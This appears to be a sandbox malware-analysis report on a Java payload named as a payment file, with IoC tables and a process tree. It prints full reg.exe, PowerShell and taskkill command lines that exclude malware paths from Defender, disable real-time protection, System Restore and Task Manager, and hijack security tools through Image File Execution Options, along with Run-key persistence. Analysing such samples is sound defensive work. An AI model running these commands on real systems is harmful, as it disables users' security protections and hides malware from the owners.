Key enumerated	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x64 en-US)\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName	reg.exe

Suspicious use of AdjustPrivilegeToken 125 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1920	WMIC.exe
Token: SeSecurityPrivilege	1920	WMIC.exe
Token: SeTakeOwnershipPrivilege	1920	WMIC.exe
Token: SeLoadDriverPrivilege	1920	WMIC.exe
Token: SeSystemProfilePrivilege	1920	WMIC.exe
Token: SeSystemtimePrivilege	1920	WMIC.exe
Token: SeProfSingleProcessPrivilege	1920	WMIC.exe
Token: SeIncBasePriorityPrivilege	1920	WMIC.exe
Token: SeCreatePagefilePrivilege	1920	WMIC.exe
Token: SeBackupPrivilege	1920	WMIC.exe
Token: SeRestorePrivilege	1920	WMIC.exe
Token: SeShutdownPrivilege	1920	WMIC.exe
Token: SeDebugPrivilege	1920	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1920	WMIC.exe
Token: SeRemoteShutdownPrivilege	1920	WMIC.exe
Token: SeUndockPrivilege	1920	WMIC.exe
Token: SeManageVolumePrivilege	1920	WMIC.exe
Token: 33	1920	WMIC.exe
Token: 34	1920	WMIC.exe
Token: 35	1920	WMIC.exe
Token: 36	1920	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1920	WMIC.exe
Token: SeSecurityPrivilege	1920	WMIC.exe
Token: SeTakeOwnershipPrivilege	1920	WMIC.exe
Token: SeLoadDriverPrivilege	1920	WMIC.exe
Token: SeSystemProfilePrivilege	1920	WMIC.exe
Token: SeSystemtimePrivilege	1920	WMIC.exe
Token: SeProfSingleProcessPrivilege	1920	WMIC.exe
Token: SeIncBasePriorityPrivilege	1920	WMIC.exe
Token: SeCreatePagefilePrivilege	1920	WMIC.exe
Token: SeBackupPrivilege	1920	WMIC.exe
Token: SeRestorePrivilege	1920	WMIC.exe
Token: SeShutdownPrivilege	1920	WMIC.exe
Token: SeDebugPrivilege	1920	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1920	WMIC.exe
Token: SeRemoteShutdownPrivilege	1920	WMIC.exe
Token: SeUndockPrivilege	1920	WMIC.exe
Token: SeManageVolumePrivilege	1920	WMIC.exe
Token: 33	1920	WMIC.exe
Token: 34	1920	WMIC.exe
Token: 35	1920	WMIC.exe
Token: 36	1920	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2212	WMIC.exe
Token: SeSecurityPrivilege	2212	WMIC.exe
Token: SeTakeOwnershipPrivilege	2212	WMIC.exe
Token: SeLoadDriverPrivilege	2212	WMIC.exe
Token: SeSystemProfilePrivilege	2212	WMIC.exe
Token: SeSystemtimePrivilege	2212	WMIC.exe
Token: SeProfSingleProcessPrivilege	2212	WMIC.exe
Token: SeIncBasePriorityPrivilege	2212	WMIC.exe
Token: SeCreatePagefilePrivilege	2212	WMIC.exe
Token: SeBackupPrivilege	2212	WMIC.exe
Token: SeRestorePrivilege	2212	WMIC.exe
Token: SeShutdownPrivilege	2212	WMIC.exe
Token: SeDebugPrivilege	2212	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2212	WMIC.exe
Token: SeRemoteShutdownPrivilege	2212	WMIC.exe
Token: SeUndockPrivilege	2212	WMIC.exe
Token: SeManageVolumePrivilege	2212	WMIC.exe
Token: 33	2212	WMIC.exe
Token: 34	2212	WMIC.exe
Token: 35	2212	WMIC.exe
Token: 36	2212	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2212	WMIC.exe
Token: SeSecurityPrivilege	2212	WMIC.exe
Token: SeTakeOwnershipPrivilege	2212	WMIC.exe
Token: SeLoadDriverPrivilege	2212	WMIC.exe
Token: SeSystemProfilePrivilege	2212	WMIC.exe
Token: SeSystemtimePrivilege	2212	WMIC.exe
Token: SeProfSingleProcessPrivilege	2212	WMIC.exe
Token: SeIncBasePriorityPrivilege	2212	WMIC.exe
Token: SeCreatePagefilePrivilege	2212	WMIC.exe
Token: SeBackupPrivilege	2212	WMIC.exe
Token: SeRestorePrivilege	2212	WMIC.exe
Token: SeShutdownPrivilege	2212	WMIC.exe
Token: SeDebugPrivilege	2212	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2212	WMIC.exe
Token: SeRemoteShutdownPrivilege	2212	WMIC.exe
Token: SeUndockPrivilege	2212	WMIC.exe
Token: SeManageVolumePrivilege	2212	WMIC.exe
Token: 33	2212	WMIC.exe
Token: 34	2212	WMIC.exe
Token: 35	2212	WMIC.exe
Token: 36	2212	WMIC.exe
Token: SeDebugPrivilege	3740	powershell.exe
Token: SeDebugPrivilege	3840	taskkill.exe
Token: SeDebugPrivilege	2428	taskkill.exe
Token: SeDebugPrivilege	1292	taskkill.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3740	powershell.exe
Token: SeSecurityPrivilege	3740	powershell.exe
Token: SeTakeOwnershipPrivilege	3740	powershell.exe
Token: SeLoadDriverPrivilege	3740	powershell.exe
Token: SeSystemProfilePrivilege	3740	powershell.exe
Token: SeSystemtimePrivilege	3740	powershell.exe
Token: SeProfSingleProcessPrivilege	3740	powershell.exe
Token: SeIncBasePriorityPrivilege	3740	powershell.exe
Token: SeCreatePagefilePrivilege	3740	powershell.exe
Token: SeBackupPrivilege	3740	powershell.exe
Token: SeRestorePrivilege	3740	powershell.exe
Token: SeShutdownPrivilege	3740	powershell.exe
Token: SeDebugPrivilege	3740	powershell.exe
Token: SeSystemEnvironmentPrivilege	3740	powershell.exe
Token: SeRemoteShutdownPrivilege	3740	powershell.exe
Token: SeUndockPrivilege	3740	powershell.exe
Token: SeManageVolumePrivilege	3740	powershell.exe
Token: 33	3740	powershell.exe
Token: 34	3740	powershell.exe
Token: 35	3740	powershell.exe
Token: 36	3740	powershell.exe
Token: SeDebugPrivilege	1868	taskkill.exe
Token: SeDebugPrivilege	2280	taskkill.exe
Token: SeDebugPrivilege	2292	taskkill.exe
Token: SeDebugPrivilege	4208	taskkill.exe
Token: SeDebugPrivilege	4884	taskkill.exe
Token: SeDebugPrivilege	3572	taskkill.exe
Token: SeDebugPrivilege	2276	taskkill.exe
Token: SeDebugPrivilege	3752	taskkill.exe
Token: SeDebugPrivilege	4440	taskkill.exe
Token: SeDebugPrivilege	4544	taskkill.exe
Token: SeDebugPrivilege	4796	taskkill.exe
Token: SeDebugPrivilege	4880	taskkill.exe
Token: SeDebugPrivilege	5028	taskkill.exe
Token: SeDebugPrivilege	4884	taskkill.exe
Token: SeDebugPrivilege	4140	taskkill.exe

Sets file execution options in registry 2 TTPs 38 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe	reg.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\PXBiH\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\PXBiH\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\PXBiH\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\PXBiH\Desktop.ini	java.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments\SaveZoneInformation = "-"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations\LowRiskFileTypes = "-"	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3740	powershell.exe
3740	powershell.exe
3740	powershell.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
2428	taskkill.exe
1820	taskkill.exe
1868	taskkill.exe
2280	taskkill.exe
4440	taskkill.exe
4884	taskkill.exe
4208	taskkill.exe
4884	taskkill.exe
3572	taskkill.exe
2276	taskkill.exe
4544	taskkill.exe
4140	taskkill.exe
1292	taskkill.exe
2292	taskkill.exe
4796	taskkill.exe
4880	taskkill.exe
5028	taskkill.exe
3840	taskkill.exe
3752	taskkill.exe

Adds Run entry to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\ulXOkad = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\PXBiH\\qMaee.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\ulXOkad = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\PXBiH\\qMaee.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\07072020-Payment.jar
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: GetForegroundWindowSpam
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Drops desktop.ini file(s)
- Adds Run entry to start application
PID:3692
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1460
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1732
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1920
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2104
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2212
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:2536
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:2876
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\PXBiH\Desktop.ini
  2⤵
  - Views/modifies file attributes
  - Drops desktop.ini file(s)
  PID:2236
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\PXBiH\Desktop.ini
  2⤵
  - Views/modifies file attributes
  - Drops desktop.ini file(s)
  PID:3176
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\PXBiH
  2⤵
  - Views/modifies file attributes
  PID:3868
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\PXBiH
  2⤵
  - Views/modifies file attributes
  PID:3952
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\PXBiH
  2⤵
  - Views/modifies file attributes
  PID:700
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\PXBiH\qMaee.class
  2⤵
  - Views/modifies file attributes
  PID:3572
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3076
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:3828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\PXBiH','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\PXBiH\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3740
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3764
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3840
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:924
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1040
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:1292
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1520
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  - System policy modification
  PID:2484
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2684
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  - System policy modification
  PID:3864
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2980
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:3432
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:908
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:3056
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1036
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:2680
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:2484
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1460
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2804
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:3076
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:2484
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2284
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2428
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1420
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1000
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2632
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2840
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2536
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2876
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2104
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1560
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3888
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3976
- C:\Windows\System32\reg.exe
